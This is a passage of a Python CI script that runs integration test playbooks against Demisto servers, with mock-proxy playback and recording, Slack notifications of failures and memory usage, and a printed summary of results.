from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
from datetime import datetime
from distutils.version import LooseVersion
import urllib3
import requests
import demisto_client.demisto_api
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
# Template for building the server base URL from an IP/hostname.
SERVER_URL = "https://{}"
# Path to the integrations list file (not referenced in this chunk — presumably used elsewhere in the file).
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
# Error template for when multiple credential instances match a test's integration
# and none was selected via instance_name; filled with (playbook, count, integration, options).
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
                            "the instance_name argument in conf.json. The options are:\n{}"
# Timeout/poll interval (seconds) for waiting on server service restarts.
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
# Slack channel id where memory-usage reports are posted (see --memCheck help text).
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
def options_handler():
    """Parse the command-line arguments and wrap them in a TestsSettings object."""
    parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
    parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
    parser.add_argument('-s', '--server', help='The server URL to connect to')
    parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
    parser.add_argument('-e', '--secret', help='Path to secret conf file')
    parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
    parser.add_argument('-t', '--slack', help='The token for slack', required=True)
    parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
    parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
    parser.add_argument('-g', '--buildName', help='The build name', required=True)
    parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
    parser.add_argument('-m', '--memCheck', type=str2bool,
                        help='Should trigger memory checks or not. The slack channel to check the data is: '
                             'dmst_content_nightly_memory_data', default=False)
    parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
                                                      'tests on(Valid only when using AMI)', default="NonAMI")
    parser.add_argument('-l', '--testsList', help='List of specific, comma separated'
                                                  'tests to run')
    parsed_options = parser.parse_args()
    return TestsSettings(parsed_options)
class TestsSettings:
    """Immutable snapshot of all configuration for a test run, built from parsed CLI options."""

    def __init__(self, options):
        self.api_key = options.apiKey
        self.server = options.server
        self.conf_path = options.conf
        self.secret_conf_path = options.secret
        self.nightly = options.nightly
        self.slack = options.slack
        self.circleci = options.circleci
        self.buildNumber = options.buildNumber
        self.buildName = options.buildName
        self.isAMI = options.isAMI
        self.memCheck = options.memCheck
        self.serverVersion = options.serverVersion
        # Filled in later by manage_tests (derived from the images data file).
        self.serverNumericVersion = None
        self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
        # A run is "local" when the user explicitly supplied a server URL.
        self.is_local_run = (self.server is not None)

    @staticmethod
    def parse_tests_list_arg(tests_list):
        """Split a comma-separated test-names string into a list; empty list when not given."""
        if not tests_list:
            return []
        return tests_list.split(",")
class PrintJob:
    """A single deferred print: the message, the function that prints it, and an optional color."""

    def __init__(self, message_to_print, print_function_to_execute, message_color=None):
        self.print_function_to_execute = print_function_to_execute
        self.message_to_print = message_to_print
        self.message_color = message_color

    def execute_print(self):
        """Invoke the stored print function; pass the color only when one was provided."""
        if not self.message_color:
            self.print_function_to_execute(self.message_to_print)
        else:
            self.print_function_to_execute(self.message_to_print, self.message_color)
class ParallelPrintsManager:
    """Queues print jobs per worker thread and flushes each queue atomically.

    Printing directly from many threads interleaves output, so each thread
    appends PrintJobs to its own queue and periodically flushes it while
    holding a shared lock.
    """

    def __init__(self, number_of_threads):
        # One job queue and one "last status report" timestamp per thread.
        self.threads_print_jobs = [[] for _ in range(number_of_threads)]
        self.print_lock = threading.Lock()
        self.threads_last_update_times = [time.time() for _ in range(number_of_threads)]

    def should_update_thread_status(self, thread_index):
        """Return True when the thread has not reported progress for over 5 minutes."""
        current_time = time.time()
        thread_last_update = self.threads_last_update_times[thread_index]
        return current_time - thread_last_update > 300

    def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
                      include_timestamp=False):
        """Queue a message to be printed later by execute_thread_prints.

        Also emits a keep-alive line when the thread has been quiet for a while,
        so CI logs show it is still running.
        """
        if include_timestamp:
            message_to_print = f'[{datetime.now()}] {message_to_print}'
        print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
        self.threads_print_jobs[thread_index].append(print_job)
        if self.should_update_thread_status(thread_index):
            print("Thread {} is still running.".format(thread_index))
            self.threads_last_update_times[thread_index] = time.time()

    def execute_thread_prints(self, thread_index):
        """Print all queued jobs for the thread, then clear its queue.

        Fixes two defects in the original: the lock was never released when a
        print raised (deadlocking every other thread), and the queue was
        cleared only after releasing the lock, so jobs added in that window
        could be dropped. The whole flush-and-clear now happens under the lock,
        with the clear guaranteed by `finally`.
        """
        with self.print_lock:
            try:
                for print_job in self.threads_print_jobs[thread_index]:
                    print_job.execute_print()
            finally:
                self.threads_print_jobs[thread_index] = []
class TestsDataKeeper:
    """Aggregates test outcomes from all worker threads into shared lists."""

    def __init__(self):
        self.succeeded_playbooks = []
        self.failed_playbooks = []
        self.skipped_tests = []
        self.skipped_integrations = []
        self.rerecorded_tests = []
        self.empty_files = []
        self.unmockable_integrations = {}

    def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
                       unmockable_integrations):
        """Merge one thread's results into the shared totals."""
        # Item-by-item appends (rather than extend) since list.append is
        # guaranteed to be thread safe.
        for pb in succeed_playbooks:
            self.succeeded_playbooks.append(pb)
        for pb in failed_playbooks:
            self.failed_playbooks.append(pb)
        for pb in skipped_tests:
            self.skipped_tests.append(pb)
        for pb in skipped_integration:
            self.skipped_integrations.append(pb)
        for pb_id, reason in unmockable_integrations.items():
            self.unmockable_integrations[pb_id] = reason

    def add_proxy_related_test_data(self, proxy):
        """Record mock-proxy statistics: re-recorded tests and empty mock files."""
        # Item-by-item appends for the same thread-safety reason as above.
        for pb_id in proxy.rerecorded_tests:
            self.rerecorded_tests.append(pb_id)
        for pb_id in proxy.empty_files:
            self.empty_files.append(pb_id)
def print_test_summary(tests_data_keeper, is_ami=True):
    """Print an end-of-run summary of all test outcomes to stdout.

    Args:
        tests_data_keeper (TestsDataKeeper): aggregated results from all threads.
        is_ami (bool): when False, mock-related counters (re-recorded tests,
            empty mock files) are reported as 0 since no proxy was used.
    """
    succeed_playbooks = tests_data_keeper.succeeded_playbooks
    failed_playbooks = tests_data_keeper.failed_playbooks
    skipped_tests = tests_data_keeper.skipped_tests
    unmocklable_integrations = tests_data_keeper.unmockable_integrations
    skipped_integration = tests_data_keeper.skipped_integrations
    rerecorded_tests = tests_data_keeper.rerecorded_tests
    empty_files = tests_data_keeper.empty_files
    succeed_count = len(succeed_playbooks)
    failed_count = len(failed_playbooks)
    skipped_count = len(skipped_tests)
    # Mock statistics are only meaningful for AMI (proxy-enabled) runs.
    rerecorded_count = len(rerecorded_tests) if is_ami else 0
    empty_mocks_count = len(empty_files) if is_ami else 0
    unmocklable_integrations_count = len(unmocklable_integrations)
    print('\nTEST RESULTS:')
    tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
    print(tested_playbooks_message)
    succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
    print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
    if failed_count > 0:
        failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
        print_error(failed_tests_message)
        for playbook_id in failed_playbooks:
            print_error('\t - ' + playbook_id)
    if rerecorded_count > 0:
        recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
        print_warning(recording_warning)
        for playbook_id in rerecorded_tests:
            print_warning('\t - ' + playbook_id)
    if empty_mocks_count > 0:
        empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
        print(empty_mock_successes_msg)
        proxy_explanation = '\t (either there were no http requests or no traffic is passed through the proxy.\n'\
                            '\t Investigate the playbook and the integrations.\n'\
                            '\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
        print(proxy_explanation)
        for playbook_id in empty_files:
            print('\t - ' + playbook_id)
    if len(skipped_integration) > 0:
        skipped_integrations_warning = '\t Number of skipped integration - ' + str(len(skipped_integration)) + ':'
        print_warning(skipped_integrations_warning)
        for playbook_id in skipped_integration:
            print_warning('\t - ' + playbook_id)
    if skipped_count > 0:
        skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
        print_warning(skipped_tests_warning)
        for playbook_id in skipped_tests:
            print_warning('\t - ' + playbook_id)
    if unmocklable_integrations_count > 0:
        unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
        print_warning(unmockable_warning)
        for playbook_id, reason in unmocklable_integrations.items():
            print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
    """Append the names of the integrations a test uses to its display message."""
    if not integrations:
        return test_message
    joined_names = ','.join(integration['name'] for integration in integrations)
    return test_message + ' with integration(s): ' + joined_names
def turn_off_telemetry(server, demisto_api_key):
    """
    Turn off telemetry on the AMI instance

    :param server: demisto server to connect to
    :param demisto_api_key: api key to use for connection
    :return: None

    Exits the whole process (exit code 1) if the server does not answer
    the telemetry request with HTTP 200.
    """
    client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
    body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
                                                               path='/telemetry?status=notelemetry')
    if status_code != 200:
        print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
        sys.exit(1)
def reset_containers(server, demisto_api_key, prints_manager, thread_index):
    """Ask the server to reset its docker containers and wait briefly for them to settle.

    Exits the whole process (exit code 1) if the reset request does not
    return HTTP 200; queued prints are flushed first so the error is visible.
    """
    prints_manager.add_print_job('Resetting containers', print, thread_index)
    client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
    body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
                                                               path='/containers/reset')
    if status_code != 200:
        error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
        prints_manager.add_print_job(error_msg, print_error, thread_index)
        prints_manager.execute_thread_prints(thread_index)
        sys.exit(1)
    # Give the containers a moment to come back up before continuing.
    sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
    """Return the names of the given integrations that are unmockable (empty list when none are)."""
    used_names = {integration['name'] for integration in integrations}
    return list(used_names & set(unmockable_integrations.keys()))
def get_docker_limit():
    """Read the cgroup memory limit (bytes) of the current container.

    Returns (stdout, stderr) from `cat`; stderr is always None because it is
    redirected into stdout.
    """
    proc = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes'],
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    out, err = proc.communicate()
    return out, err
def get_docker_processes_data():
    """Capture the output of `ps aux` for memory/process reporting.

    Returns (stdout, stderr); stderr is always None (merged into stdout).
    """
    proc = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    out, err = proc.communicate()
    return out, err
def get_docker_memory_data():
    """Read the cgroup memory usage (bytes) of the current container.

    Returns (stdout, stderr); stderr is always None (merged into stdout).
    """
    proc = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes'],
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    out, err = proc.communicate()
    return out, err
def send_slack_message(slack, chanel, text, user_name, as_user):
    """Post a markdown-enabled message to a Slack channel.

    :param slack: Slack API token.
    :param chanel: channel id to post to. (NOTE: "chanel" is a typo, but it is
        part of the public signature and kept for compatibility.)
    :param text: message body.
    :param user_name: display name to post as.
    :param as_user: Slack `as_user` flag, passed through verbatim.
    """
    sc = SlackClient(slack)
    sc.api_call(
        "chat.postMessage",
        channel=chanel,
        username=user_name,
        as_user=as_user,
        text=text,
        mrkdwn='true'
    )
def run_test_logic(tests_settings, c, failed_playbooks, integrations, playbook_id, succeed_playbooks,
                   test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
                   prints_manager, thread_index=0, is_mock_run=False):
    """Run a single test playbook and record it as succeeded or failed.

    COMPLETED and NOT_SUPPORTED_VERSION both count as success; any other status
    marks the playbook failed and (on CI runs) notifies the build author on Slack.

    Returns:
        bool: True when the test is considered successful.
    """
    status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
                                      is_mock_run, thread_index=thread_index)
    # c.api_client.pool.close()
    if status == PB_Status.COMPLETED:
        prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
                                     message_color=LOG_COLORS.GREEN)
        succeed_playbooks.append(playbook_id)
    elif status == PB_Status.NOT_SUPPORTED_VERSION:
        not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
        prints_manager.add_print_job(not_supported_version_message, print, thread_index)
        succeed_playbooks.append(playbook_id)
    else:
        error_message = 'Failed: {} failed'.format(test_message)
        prints_manager.add_print_job(error_message, print_error, thread_index)
        playbook_id_with_mock = playbook_id
        # Mark non-mock failures so the summary distinguishes them.
        if not is_mock_run:
            playbook_id_with_mock += " (Mock Disabled)"
        failed_playbooks.append(playbook_id_with_mock)
        # Slack notifications only make sense on CI builds, not local runs.
        if not tests_settings.is_local_run:
            notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
    succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
    return succeed
# run the test using a real instance, record traffic.
def run_and_record(tests_settings, c, proxy, failed_playbooks, integrations, playbook_id, succeed_playbooks,
                   test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
                   prints_manager, thread_index=0):
    """Run a test against the real instance while the proxy records traffic.

    The recording happens in the proxy's temp folder; the mock file is only
    moved to the repo folder when the test succeeded.

    Returns:
        bool: whether the recorded run succeeded.
    """
    proxy.set_tmp_folder()
    proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
    succeed = run_test_logic(tests_settings, c, failed_playbooks, integrations, playbook_id, succeed_playbooks,
                             test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
                             prints_manager, thread_index=thread_index, is_mock_run=True)
    proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
    proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
    if succeed:
        proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
    # Always switch the proxy back to the repo folder, even on failure.
    proxy.set_repo_folder()
    return succeed
def mock_run(tests_settings, c, proxy, failed_playbooks, integrations, playbook_id, succeed_playbooks,
             test_message, test_options, slack, circle_ci, build_number, server_url, build_name, start_message,
             prints_manager, thread_index=0):
    """Run a test through the mock proxy: play back an existing mock if present,
    otherwise (or on playback failure) record a fresh one.

    Flow:
      1. If a mock file exists, play it back; COMPLETED / NOT_SUPPORTED_VERSION
         finish the test successfully, FAILED_DOCKER_TEST fails it outright.
      2. Any other playback failure (or no mock file) falls through to a
         recording run via run_and_record; a successful re-record after a
         playback failure is tracked in proxy.rerecorded_tests.
    """
    rerecord = False
    if proxy.has_mock_file(playbook_id):
        start_mock_message = '{} (Mock: Playback)'.format(start_message)
        prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
        proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
        # run test
        status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
                                     is_mock_run=True, thread_index=thread_index)
        # use results
        proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
        if status == PB_Status.COMPLETED:
            succeed_message = 'PASS: {} succeed'.format(test_message)
            prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
            succeed_playbooks.append(playbook_id)
            end_mock_message = f'------ Test {test_message} end ------\n'
            prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
            return
        if status == PB_Status.NOT_SUPPORTED_VERSION:
            not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
            prints_manager.add_print_job(not_supported_version_message, print, thread_index)
            succeed_playbooks.append(playbook_id)
            end_mock_message = f'------ Test {test_message} end ------\n'
            prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
            return
        if status == PB_Status.FAILED_DOCKER_TEST:
            # Docker-check failures are genuine test failures — no point re-recording.
            error_message = 'Failed: {} failed'.format(test_message)
            prints_manager.add_print_job(error_message, print_error, thread_index)
            failed_playbooks.append(playbook_id)
            end_mock_message = f'------ Test {test_message} end ------\n'
            prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
            return
        # Playback failed for another reason: fall through to a recording run.
        mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
        prints_manager.add_print_job(mock_failed_message, print, thread_index)
        rerecord = True
    else:
        mock_recording_message = start_message + ' (Mock: Recording)'
        prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
    # Mock recording - no mock file or playback failure.
    succeed = run_and_record(tests_settings, c, proxy, failed_playbooks, integrations, playbook_id, succeed_playbooks,
                             test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
                             prints_manager, thread_index=thread_index)
    if rerecord and succeed:
        proxy.rerecorded_tests.append(playbook_id)
    test_end_message = f'------ Test {test_message} end ------\n'
    prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(tests_settings, demisto_api_key, proxy, failed_playbooks, integrations, unmockable_integrations,
             playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
             server_url, build_name, prints_manager, is_ami=True, thread_index=0):
    """Dispatch a single test either to a direct (mock-disabled) run or a mocked run.

    Mocking is disabled when not running on AMI, when the test uses no
    integrations, or when any of its integrations is unmockable; otherwise the
    test goes through mock_run (playback/record via the proxy).
    """
    start_message = f'------ Test {test_message} start ------'
    client = demisto_client.configure(base_url=server_url, api_key=demisto_api_key, verify_ssl=False)
    if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
        prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
        run_test_logic(tests_settings, client, failed_playbooks, integrations, playbook_id, succeed_playbooks,
                       test_message, test_options, slack, circle_ci, build_number, server_url, build_name,
                       prints_manager, thread_index=thread_index)
        prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
                                     include_timestamp=True)
        return
    mock_run(tests_settings, client, proxy, failed_playbooks, integrations, playbook_id, succeed_playbooks,
             test_message, test_options, slack, circle_ci, build_number, server_url, build_name, start_message,
             prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
    """GET `url` and return the parsed JSON response body.

    Args:
        url (str): full URL to request.
        params_dict (dict): optional query-string parameters.

    Raises:
        requests.HTTPError: when the response status is 4xx/5xx.
        requests.RequestException: on connection-level failures.

    The original wrapped the call in `except Exception as e: raise e`, which
    re-raises the identical exception and adds nothing — removed.
    """
    res = requests.request("GET",
                           url,
                           verify=True,
                           params=params_dict,
                           )
    res.raise_for_status()
    return res.json()
def get_user_name_from_circle(circleci_token, build_number):
    """Return the display name of the user who triggered the given CircleCI build ('' if absent)."""
    url = ("https://circleci.com/api/v1.1/project/github/demisto/content/{0}"
           "?circle-token={1}").format(build_number, circleci_token)
    response = http_request(url)
    return response.get('user', {}).get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
    """Direct-message the CircleCI build author on Slack about a failed test playbook.

    The message links to the incident work plan when an incident id is known
    (inc_id != -1). If the author's name cannot be matched to a Slack user,
    nothing is sent.
    """
    circle_user_name = get_user_name_from_circle(circle_ci, build_number)
    sc = SlackClient(slack)
    user_id = retrieve_id(circle_user_name, sc)
    text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
        else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
    if user_id:
        sc.api_call(
            "chat.postMessage",
            channel=user_id,
            username="Content CircleCI",
            as_user="False",
            text=text
        )
def retrieve_id(circle_user_name, sc):
    """Return the Slack user id whose normalized real name equals `circle_user_name` ('' when none).

    The scan deliberately runs through the whole member list without breaking,
    so when several members share the name the last match wins (original behavior).
    """
    user_id = ''
    members = sc.api_call('users.list').get('members', [])
    for member in members:
        real_name = member.get('profile', {}).get('real_name_normalized', '')
        if real_name == circle_user_name:
            user_id = member.get('id', '')
    return user_id
def create_result_files(tests_data_keeper):
    """Write failed/skipped test and integration names to text files under ./Tests for the CI build."""
    output_map = {
        "./Tests/failed_tests.txt": tests_data_keeper.failed_playbooks,
        './Tests/skipped_tests.txt': tests_data_keeper.skipped_tests,
        './Tests/skipped_integrations.txt': tests_data_keeper.skipped_integrations,
    }
    for file_path, entries in output_map.items():
        with open(file_path, "w") as results_file:
            results_file.write('\n'.join(entries))
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
                           prints_manager, thread_index=0):
    """Fill each integration dict in-place with credentials from the secret conf.

    When several credential sets exist for an integration, one must match a name
    in `instance_names`; otherwise an error is queued and False is returned.
    The built-in 'Demisto REST API' integration gets synthetic localhost params.

    Returns:
        bool: True when every integration was configured successfully.
    """
    for integration in integrations:
        candidates = [params for params in secret_params if params['name'] == integration['name']]
        if candidates:
            chosen = candidates[0]
            if len(candidates) != 1:
                matched = False
                # No break: when several candidates match, the last one wins (original behavior).
                for candidate in candidates:
                    if candidate.get('instance_name', 'Not Found') in instance_names:
                        chosen = candidate
                        matched = True
                if not matched:
                    optional_instance_names = [candidate.get('instance_name', 'None')
                                               for candidate in candidates]
                    error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(candidates),
                                                                 integration['name'],
                                                                 '\n'.join(optional_instance_names))
                    prints_manager.add_print_job(error_msg, print_error, thread_index)
                    return False
            integration['params'] = chosen.get('params', {})
            integration['byoi'] = chosen.get('byoi', True)
            integration['instance_name'] = chosen.get('instance_name', integration['name'])
            integration['validate_test'] = chosen.get('validate_test', True)
        elif integration['name'] == 'Demisto REST API':
            integration['params'] = {
                'url': 'https://localhost',
                'apikey': demisto_api_key,
                'insecure': True,
            }
    return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
    """Build the integration dicts for one test and collect its skip/nightly metadata.

    Skipped names are added to the shared `skipped_integration` set (with their
    reason) and returned separately, but are still included in the integration
    list — the caller decides whether to skip the whole test.

    Returns:
        tuple: (skipped names used by this test, integration dicts, True when any
        integration is nightly-only).
    """
    integrations = []
    is_nightly_integration = False
    test_skipped_integration = []
    for integration_name in integrations_conf:
        if integration_name in skipped_integrations_conf.keys():
            reason = skipped_integrations_conf[integration_name]
            skipped_integration.add("{0} - reason: {1}".format(integration_name, reason))
            test_skipped_integration.append(integration_name)
        if integration_name in nightly_integrations:
            is_nightly_integration = True
        # string description
        integrations.append({
            'name': integration_name,
            'params': {}
        })
    return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
    """Read the CI filter file and return (filtered_tests, is_filter_configured, run_all).

    Nightly runs ignore the filter file entirely and run everything.
    """
    if is_nightly:
        # TODO: verify this response
        return [], False, True
    with open(FILTER_CONF, 'r') as filter_file:
        filtered_tests = [line.strip('\n') for line in filter_file.readlines()]
    return filtered_tests, bool(filtered_tests), RUN_ALL_TESTS_FORMAT in filtered_tests
def load_conf_files(conf_path, secret_conf_path):
    """Load the tests conf JSON and, when a path was supplied, the secret conf JSON.

    Returns:
        tuple: (conf dict, secret conf dict or None).
    """
    with open(conf_path) as conf_file:
        conf = json.load(conf_file)
    if not secret_conf_path:
        return conf, None
    with open(secret_conf_path) as secret_file:
        return conf, json.load(secret_file)
def run_test_scenario(tests_settings, t, proxy, default_test_timeout, skipped_tests_conf, nightly_integrations,
                      skipped_integrations_conf, skipped_integration, is_nightly, run_all_tests, is_filter_configured,
                      filtered_tests, skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
                      unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server, build_name,
                      server_numeric_version, demisto_api_key, prints_manager, thread_index=0, is_ami=True):
    """Decide whether a single conf.json test record should run, and run it.

    Applies, in order: nightly gating, the CI filter file, the skipped-tests and
    skipped-integrations lists, and a server-version range check; then resolves
    integration credentials and delegates to run_test. Appends outcomes to the
    shared succeed/failed/skipped collections.
    """
    playbook_id = t['playbookID']
    nightly_test = t.get('nightly', False)
    integrations_conf = t.get('integrations', [])
    instance_names_conf = t.get('instance_names', [])
    test_message = 'playbook: ' + playbook_id
    # Per-test resource limits, falling back to global defaults.
    test_options = {
        'timeout': t.get('timeout', default_test_timeout),
        'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
        'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
    }
    # conf.json allows a single string where a list is expected — normalize.
    if not isinstance(integrations_conf, list):
        integrations_conf = [integrations_conf, ]
    if not isinstance(instance_names_conf, list):
        instance_names_conf = [instance_names_conf, ]
    test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
        integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
    # Track skipped integrations that a filtered-in test actually needs (reported on PRs).
    if playbook_id in filtered_tests:
        playbook_skipped_integration.update(test_skipped_integration)
    skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
    # Skip nightly test
    if skip_nightly_test:
        prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
                                     include_timestamp=True)
        prints_manager.add_print_job('Skip test', print, thread_index)
        prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
                                     include_timestamp=True)
        return
    if not run_all_tests:
        # Skip filtered test
        if is_filter_configured and playbook_id not in filtered_tests:
            return
        # Skip bad test
        if playbook_id in skipped_tests_conf:
            skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
            return
        # Skip integration
        if test_skipped_integration:
            return
    # Skip version mismatch test
    test_from_version = t.get('fromversion', '0.0.0')
    test_to_version = t.get('toversion', '99.99.99')
    if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
        prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
                                     include_timestamp=True)
        warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
                                                                                                  test_from_version,
                                                                                                  test_to_version)
        prints_manager.add_print_job(warning_message, print_warning, thread_index)
        prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
                                     include_timestamp=True)
        return
    are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
                                            playbook_id, prints_manager, thread_index=thread_index)
    if not are_params_set:
        failed_playbooks.append(playbook_id)
        return
    test_message = update_test_msg(integrations, test_message)
    # NOTE(review): this re-parses sys.argv on every test to read the memCheck/nightly
    # flags — presumably intentional, but tests_settings already carries them; verify.
    options = options_handler()
    stdout, stderr = get_docker_memory_data()
    text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
    if options.nightly and options.memCheck and not tests_settings.is_local_run:
        # Report container memory and process data to the memory-monitoring Slack channel.
        send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
        stdout, stderr = get_docker_processes_data()
        text = stdout if not stderr else stderr
        send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
    run_test(tests_settings, demisto_api_key, proxy, failed_playbooks, integrations, unmockable_integrations,
             playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
             build_number, server, build_name, prints_manager, is_ami, thread_index=thread_index)
def get_and_print_server_numeric_version(tests_settings):
    """Derive the numeric Demisto server version from the AMI images data file.

    Falls back to '99.99.98' (treated as "latest") on local runs, when the
    images file is missing, or when the expected single matching line cannot
    be found or parsed.
    """
    if tests_settings.is_local_run or not os.path.isfile('./Tests/images_data.txt'):
        # TODO: verify this logic, it's a workaround because the test_image file does not exist on local run
        return '99.99.98'  # latest
    with open('./Tests/images_data.txt', 'r') as image_data_file:
        image_data = [line for line in image_data_file if line.startswith(tests_settings.serverVersion)]
    if len(image_data) != 1:
        print('Did not get one image data for server version, got {}'.format(image_data))
        return '99.99.98'  # latest
    version_matches = re.findall(r'Demisto-Circle-CI-Content-[\w-]+-([\d.]+)-[\d]{5}', image_data[0])
    server_numeric_version = version_matches[0] if version_matches else '99.99.98'
    if server_numeric_version.count('.') == 1:
        # Normalize two-part versions (e.g. "5.0") to three parts ("5.0.0").
        server_numeric_version += ".0"
    print('Server image info: {}'.format(image_data[0]))
    print('Server version: {}'.format(server_numeric_version))
    return server_numeric_version
def get_instances_ips_and_names(tests_settings):
    """Return the server addresses to test against.

    A user-supplied server yields a single-element list; otherwise each line of
    the build's instance_ips file is split on ':' into its fields.
    """
    if tests_settings.server:
        return [tests_settings.server]
    with open('./Tests/instance_ips.txt', 'r') as instance_file:
        return [line.strip('\n').split(":") for line in instance_file.readlines()]
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
    """Return the conf.json test records whose playbookID appears in the given names."""
    conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
    matching_records = []
    for record in conf['tests']:
        record_name = record.get("playbookID")
